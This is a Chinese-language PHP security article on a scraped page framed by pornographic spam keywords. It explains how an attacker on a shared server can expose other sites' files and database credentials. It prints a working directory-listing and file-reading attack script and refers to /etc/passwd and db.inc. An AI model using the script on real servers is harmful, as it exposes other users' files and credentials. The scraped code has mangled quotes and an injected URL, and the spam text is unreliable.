色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術文章
文章詳情頁

PHP安全-文件系統瀏覽

瀏覽:78日期:2022-09-11 18:04:01
文件系統瀏覽

除了能在共享服務器上讀取任意文件之外,攻擊者還能建立一個可以瀏覽文件系統的腳本。由于你的大多數敏感文件不會保存在網站主目錄下,此類腳本一般用于找到你的源文件的所在位置。請看下例:

<pre>

<?php

if (isset($_GET[’dir’]))

{

ls($_GET[’dir’]);

}

elseif (isset($_GET[’file’]))

{

cat($_GET[’file’]);

}

else

{

ls(’/’);

}

function cat($file)

{

echo htmlentities(file_get_contents($file), ENT_QUOTES, ’UTF-8’));

}

function ls($dir)

{

$handle = dir($dir);

while ($filename = $handle->read())

{

$size = filesize('$dir$filename');

if (is_dir('$dir$filename'))

{

$type = ’dir’;

$filename .= ’/’;

}

else

{

$type = ’file’;

}

if (is_readable('$dir$filename'))

{

$line = str_pad($size, 15);

$line .= '<a href='http://www.lshqa.cn/bcjs/{$_SERVER[’PHP_SELF’]}';

$line .= '?$type=$dir$filename'>$filename</a>';

}

else

{

$line = str_pad($size, 15);

$line .= $filename;

}

echo '$linen';

}

$handle->close();

}

?>

</pre>

攻擊者可能會首先察看/etc/passwd文件或/home目錄以取得該服務器上的用戶名清單;可以通過語言的結構如include或require來發現保存在網站主目錄以外的源文件所在位置。例如,考慮一下下面的腳本文件/home/victim/public_html/admin.php:

<?php

include ’../inc/db.inc’;

/* ... */

?>

如果攻擊者設法顯示了該文件的源碼,就可以發現db.inc的所在位置,同時他可以使用readfile()函數來使其內容暴露,取得了數據庫的訪問權限。這樣,在這個環境中保存db.inc于網站主目錄之外的做法并未起到保護作用。

這一攻擊說明了為什么要把共享服務器上的所有源文件看成是公開的,并要選擇數據庫實現所有敏感數據的保存。

標簽: PHP
相關文章:
主站蜘蛛池模板: 日本综合欧美一区二区三区 | 免费永久观看美女视频网站网址 | 一级毛片免费在线观看网站 | 国产精品久久久久a影院 | 国产精品亚洲第一区柳州莫青 | 亚洲伊人色一综合网 | 97久久精品一区二区三区 | 日韩特级| 国产精品毛片在线更新 | 中文字幕日韩精品有码视频 | 鸥美性生交xxxxx久久久 | 国产激情一区二区三区在线观看 | 日日摸人人看97人人澡 | 欧美日韩精品一区二区另类 | 女人张开腿让男人 | 一级做a爰片久久毛片看看 一级做a爰片久久毛片鸭王 | 国产精品精品国产一区二区 | 国产美女91视频 | 亚洲欧美94色| 精品一区二区三区高清免费不卡 | 午夜欧美成人香蕉剧场 | 国模在线播放 | 亚洲精品久久久久久久网站 | 在线精品日韩一区二区三区 | 亚洲视频男人的天堂 | 交视频在线观看国产网站 | 欧美日韩在线观看区一二 | 99精品网| 日韩午夜在线视频不卡片 | 色色视频免费网 | 精品久久久久久久 | www.av网| 日韩欧美视频在线播放 | 免费一级欧美大片视频在线 | 91成人免费 | 亚洲国产精品免费观看 | 成年人免费视频观看 | 在线视频日韩精品 | 农村寡妇偷毛片一级 | 日韩 欧美 国产 师生 制服 | 亚洲精品99久久一区二区三区 |